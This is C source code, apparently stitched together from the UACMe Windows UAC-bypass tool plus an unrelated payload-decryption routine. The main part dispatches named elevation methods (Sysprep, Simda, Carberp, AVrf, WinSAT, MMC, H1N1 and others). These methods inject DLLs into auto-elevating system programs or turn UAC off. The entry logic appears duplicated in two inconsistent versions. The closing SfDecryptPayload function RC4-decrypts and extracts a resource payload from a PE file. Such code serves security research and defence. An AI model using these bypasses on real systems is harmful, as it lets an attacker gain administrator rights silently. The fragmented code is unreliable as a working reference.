paramLen = 0;
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, ¶mLen);
if (paramLen > 0) {
if (dwType != METHOD_REDIRECTEXE) {
supSetParameter((LPWSTR)&szBuffer, paramLen * sizeof(WCHAR));
}
}
switch (dwType) {
case METHOD_SYSPREP1:
case METHOD_SYSPREP2:
case METHOD_SYSPREP3:
case METHOD_OOBE:
case METHOD_TILON:
//
// Since we are using injection and not using heavens gate/syswow64, we should ban usage under wow64.
//
#ifndef _DEBUG
if (g_ldp.IsWow64) {
ucmShowMessage(WOW64STRING);
return ERROR_UNSUPPORTED_TYPE;
}
#endif
if (ucmStandardAutoElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
}
break;
//
// Allow only in 32 version.
//
#ifndef _WIN64
case METHOD_REDIRECTEXE:
case METHOD_SHIMPATCH:
if (ucmAppcompatElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL), (paramLen != 0) ? szBuffer : NULL )) {
OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
}
break;
#endif
case METHOD_SIMDA:
//
// Since we are using injection and not using heavens gate, we should ban usage under wow64.
//
#ifndef _DEBUG
if (g_ldp.IsWow64) {
ucmShowMessage(WOW64STRING);
return ERROR_UNSUPPORTED_TYPE;
}
#endif
if (MessageBox(GetDesktopWindow(),
TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES)
{
if (ucmSimdaTurnOffUac()) {
OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
}
}
break;
case METHOD_CARBERP:
case METHOD_CARBERP_EX:
if (dwType == METHOD_CARBERP) {
//there is no migmiz in syswow64 in 8+
if ((g_ldp.IsWow64) && (g_ldp.osver.dwBuildNumber > 7601)) {
ucmShowMessage(WOW64STRING);
return ERROR_UNSUPPORTED_TYPE;
}
}
if (dwType == METHOD_CARBERP_EX) {
#ifndef _DEBUG
if (g_ldp.IsWow64) {
ucmShowMessage(WOW64STRING);
return ERROR_UNSUPPORTED_TYPE;
}
#endif
}
if (ucmWusaMethod(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
}
break;
case METHOD_AVRF:
#ifndef _DEBUG
if (g_ldp.IsWow64) {
ucmShowMessage(WOW64STRING);
return ERROR_UNSUPPORTED_TYPE;
}
#endif
if (ucmAvrfMethod((CONST PVOID)AVRFDLL, sizeof(AVRFDLL))) {
OutputDebugString(TEXT("[UCM] AVrf method called\n\r"));
}
break;
case METHOD_WINSAT:
//
// Decoding WOW64 environment, turning wow64fs redirection is meeh. Just drop it as it just a test tool.
//
if (g_ldp.IsWow64) {
ucmShowMessage(LAZYWOW64UNSUPPORTED);
return ERROR_UNSUPPORTED_TYPE;
}
if (g_ldp.osver.dwBuildNumber < 9200) {
p = L"powrprof.dll";
}
else {
p = L"devobj.dll";
}
if (ucmWinSATMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL), (g_ldp.osver.dwBuildNumber <= 10136))) {
OutputDebugString(TEXT("[UCM] WinSAT method called\n\r"));
}
break;
case METHOD_MMC:
if (g_ldp.IsWow64) {
ucmShowMessage(WOW64STRING);
return ERROR_UNSUPPORTED_TYPE;
}
p = L"elsext.dll";
if (ucmMMCMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] MMC method called\n\r"));
}
break;
case METHOD_H1N1:
if (g_ldp.IsWow64) {
ucmShowMessage(WOW64STRING);
return ERROR_UNSUPPORTED_TYPE;
}
if (ucmH1N1Method((CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] H1N1 method called\n\r"));
}
break;
case METHOD_GENERIC:
if (g_ldp.IsWow64) {
ucmShowMessage(WOW64STRING);
return ERROR_UNSUPPORTED_TYPE;
}
p = L"ntwdblib.dll";
if (ucmGenericAutoelevation(
METHOD_SQLSRV_TARGETAPP,
p,
(CONST PVOID)INJECTDLL, sizeof(INJECTDLL)))
{
OutputDebugString(TEXT("[UCM] Generic method called\n\r"));
}
break;
}
return ERROR_SUCCESS;
}
/*
* main
*
* Purpose:
*
* Program entry point.
*
*/
VOID main()
{
BOOL IsWow64 = FALSE;
DWORD bytesIO, dwType;
WCHAR *p;
WCHAR szBuffer[MAX_PATH + 1];
TOKEN_ELEVATION_TYPE ElevType;
RTL_OSVERSIONINFOW osver;
//verify system version
RtlSecureZeroMemory(&osver, sizeof(osver));
osver.dwOSVersionInfoSize = sizeof(osver);
RtlGetVersion(&osver);
if (osver.dwBuildNumber < 7000) {
MessageBox(GetDesktopWindow(),
TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
ElevType = TokenElevationTypeDefault;
if (!supGetElevationType(&ElevType)) {
goto Done;
}
if (ElevType != TokenElevationTypeLimited) {
MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."),
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
IsWow64 = supIsProcess32bit(GetCurrentProcess());
dwType = 0;
bytesIO = 0;
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) {
dwType = strtoul(szBuffer);
switch (dwType) {
case METHOD_SYSPREP:
OutputDebugString(TEXT("[UCM] Sysprep\n\r"));
if (osver.dwBuildNumber > 9200) {
MessageBox(GetDesktopWindow(), WINPREBLUE,
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
break;
case METHOD_SYSPREP_EX:
OutputDebugString(TEXT("[UCM] Sysprep_ex\n\r"));
if (osver.dwBuildNumber < 9600) {
MessageBox(GetDesktopWindow(), WINBLUEONLY,
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
break;
case METHOD_OOBE:
OutputDebugString(TEXT("[UCM] Oobe\n\r"));
break;
case METHOD_REDIRECTEXE:
OutputDebugString(TEXT("[UCM] AppCompat RedirectEXE\n\r"));
#ifdef _WIN64
MessageBox(GetDesktopWindow(), WOW64WIN32ONLY,
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
#endif
break;
case METHOD_SIMDA:
OutputDebugString(TEXT("[UCM] Simda\n\r"));
break;
case METHOD_CARBERP:
OutputDebugString(TEXT("[UCM] Carberp\n\r"));
break;
case METHOD_CARBERP_EX:
OutputDebugString(TEXT("[UCM] Carberp_ex\n\r"));
break;
case METHOD_TILON:
OutputDebugString(TEXT("[UCM] Tilon\n\r"));
if (osver.dwBuildNumber > 9200) {
MessageBox(GetDesktopWindow(), WINPREBLUE,
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
break;
case METHOD_AVRF:
OutputDebugString(TEXT("[UCM] AVrf\n\r"));
break;
case METHOD_WINSAT:
OutputDebugString(TEXT("[UCM] WinSAT\n\r"));
break;
case METHOD_SHIMPATCH:
OutputDebugString(TEXT("[UCM] AppCompat Shim Patch\n\r"));
#ifdef _WIN64
MessageBox(GetDesktopWindow(), WOW64WIN32ONLY,
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
#endif
break;
}
}
switch (dwType) {
case METHOD_SYSPREP:
case METHOD_SYSPREP_EX:
case METHOD_OOBE:
case METHOD_TILON:
//
// Since we are using injection and not using heavens gate, we should ban usage under wow64.
//
#ifndef _DEBUG
if (IsWow64) {
MessageBox(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
#endif
if (ucmStandardAutoElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
}
break;
//
// Allow only in 32 version.
//
#ifndef _WIN64
case METHOD_REDIRECTEXE:
case METHOD_SHIMPATCH:
if (ucmAppcompatElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
}
break;
#endif
case METHOD_SIMDA:
//
// Since we are using injection and not using heavens gate, we should ban usage under wow64.
//
#ifndef _DEBUG
if (IsWow64) {
MessageBox(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
#endif
if (MessageBox(GetDesktopWindow(),
TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES)
{
if (ucmSimdaTurnOffUac()) {
OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
}
}
break;
case METHOD_CARBERP:
case METHOD_CARBERP_EX:
if (dwType == METHOD_CARBERP) {
if (osver.dwBuildNumber > 9600) {
MessageBox(GetDesktopWindow(),
TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
//there is no migmiz in syswow64 in 8+
if ((IsWow64) && (osver.dwBuildNumber > 7601)) {
MessageBox(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
}
if (dwType == METHOD_CARBERP_EX) {
#ifndef _DEBUG
if (IsWow64) {
MessageBox(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
#endif
}
if (ucmWusaMethod(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
}
break;
case METHOD_AVRF:
#ifndef _DEBUG
if (IsWow64) {
MessageBox(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
#endif
if (ucmAvrfMethod((CONST PVOID)AVRFDLL, sizeof(AVRFDLL))) {
OutputDebugString(TEXT("[UCM] AVrf method called\n\r"));
}
break;
case METHOD_WINSAT:
//
// Decoding WOW64 environment, turning wow64fs redirection is meeh. Just drop it as it just a test tool.
//
if (IsWow64) {
MessageBox(GetDesktopWindow(),
TEXT("Use 32 bit version of this tool on 32 bit OS version"), PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
if (osver.dwBuildNumber < 9200) {
p = L"powrprof.dll";
}
else {
p = L"devobj.dll";
}
if (ucmWinSATMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] WinSAT method called\n\r"));
}
break;
}
Done:
ExitProcess(0);
}
UINT SfDecryptPayload(
LPWSTR lpParameter
)
{
BOOL cond = FALSE, bSuccess = FALSE;
PBYTE cng_object, hashdata, decrypted, enc_data, extracted;
ULONG obj_sz, rlen, hdatasz, enc_data_size;
BCRYPT_ALG_HANDLE h_alg = NULL;
BCRYPT_HASH_HANDLE h_hash = NULL;
BCRYPT_KEY_HANDLE h_rc4key = NULL;
NTSTATUS status;
HANDLE pheap = NULL;
PIMAGE_FILE_HEADER fheader;
PVOID pdll = NULL;
WCHAR InputFile[MAX_PATH + 1], OutputFile[MAX_PATH + 1];
rlen = 0;
RtlSecureZeroMemory(InputFile, sizeof(InputFile));
GetCommandLineParam(lpParameter, 1, InputFile, MAX_PATH, &rlen);
if (rlen == 0) {
SfcuiPrintText(g_ConOut,
T_SFDECRYPTUSAGE,
g_ConsoleOutput, FALSE);
return (UINT)-1;
}
do {
rlen = 0;
GetCommandLineParam(lpParameter, 2, OutputFile, MAX_PATH, &rlen);
if (rlen == 0)
_strcpy(OutputFile, TEXT("out.bin"));
pdll = SfuCreateFileMappingNoExec(InputFile);
if (pdll == NULL)
break;
enc_data_size = 0;
enc_data = SfuQueryResourceData(2, pdll, &enc_data_size);
if (enc_data == NULL)
break;
fheader = &(RtlImageNtHeader(pdll)->FileHeader);
status = BCryptOpenAlgorithmProvider(&h_alg, BCRYPT_MD5_ALGORITHM, NULL, 0);
if (!NT_SUCCESS(status))
break;
obj_sz = 0;
rlen = 0;
status = BCryptGetProperty(h_alg, BCRYPT_OBJECT_LENGTH, (PUCHAR)&obj_sz, sizeof(obj_sz), &rlen, 0);
if (!NT_SUCCESS(status))
break;
hdatasz = 0;
rlen = 0;
status = BCryptGetProperty(h_alg, BCRYPT_HASH_LENGTH, (PUCHAR)&hdatasz, sizeof(hdatasz), &rlen, 0);
if (!NT_SUCCESS(status))
break;
pheap = HeapCreate(0, 0, 0);
if (pheap == NULL)
break;
cng_object = HeapAlloc(pheap, HEAP_ZERO_MEMORY, obj_sz);
if (cng_object == NULL)
break;
hashdata = HeapAlloc(pheap, HEAP_ZERO_MEMORY, hdatasz);
if (hashdata == NULL)
break;
status = BCryptCreateHash(h_alg, &h_hash, cng_object, obj_sz, NULL, 0, 0);
if (!NT_SUCCESS(status))
break;
status = BCryptHashData(h_hash, (PUCHAR)fheader, sizeof(IMAGE_FILE_HEADER), 0);
if (!NT_SUCCESS(status))
break;
status = BCryptFinishHash(h_hash, hashdata, hdatasz, 0);
if (!NT_SUCCESS(status))
break;
BCryptDestroyHash(h_hash);
BCryptCloseAlgorithmProvider(h_alg, 0);
HeapFree(pheap, 0, cng_object);
h_alg = NULL;
h_hash = NULL;
status = BCryptOpenAlgorithmProvider(&h_alg, BCRYPT_RC4_ALGORITHM, NULL, 0);
if (!NT_SUCCESS(status))
break;
obj_sz = 0;
rlen = 0;
status = BCryptGetProperty(h_alg, BCRYPT_OBJECT_LENGTH, (PUCHAR)&obj_sz, sizeof(obj_sz), &rlen, 0);
if (!NT_SUCCESS(status))
break;
cng_object = HeapAlloc(pheap, HEAP_ZERO_MEMORY, obj_sz);
if (cng_object == NULL)
break;
status = BCryptGenerateSymmetricKey(h_alg, &h_rc4key, cng_object, obj_sz, hashdata, hdatasz, 0);
if (!NT_SUCCESS(status))
break;
decrypted = HeapAlloc(pheap, HEAP_ZERO_MEMORY, enc_data_size);
if (decrypted == NULL)
break;
rlen = 0;
status = BCryptEncrypt(h_rc4key, enc_data, enc_data_size, NULL, NULL, 0, decrypted, enc_data_size, &rlen, 0);
if (!NT_SUCCESS(status))
break;
bSuccess = FALSE;
enc_data_size = rlen;
rlen = 0;
extracted = SfcabExtractMemory(decrypted, enc_data_size, &rlen);
if (extracted) {
if (SfuWriteBufferToFile(OutputFile, extracted, rlen, FALSE, FALSE) == rlen) {
bSuccess = TRUE;
}
LocalFree(extracted);
}
else {
//failed to extract, drop cab as is
if (SfuWriteBufferToFile(OutputFile, decrypted, enc_data_size, FALSE, FALSE) == enc_data_size) {
bSuccess = TRUE;
}
}
if (bSuccess) {
SfcuiPrintText(g_ConOut,
T_SFDECRYPTED,
g_ConsoleOutput, FALSE);
SfcuiPrintText(g_ConOut,
OutputFile,
g_ConsoleOutput, FALSE);
}
} while (cond);
if (bSuccess == FALSE) {
SfcuiPrintText(g_ConOut,
T_SFDECRYPTFAIL,
g_ConsoleOutput, FALSE);
}
if (h_rc4key != NULL)
BCryptDestroyKey(h_rc4key);
if (h_hash != NULL)
BCryptDestroyHash(h_hash);
if (h_alg != NULL)
BCryptCloseAlgorithmProvider(h_alg, 0);
if (pheap != NULL)
HeapDestroy(pheap);
if (pdll != 0)
NtUnmapViewOfSection(NtCurrentProcess(), (PVOID)pdll);
return 0;
}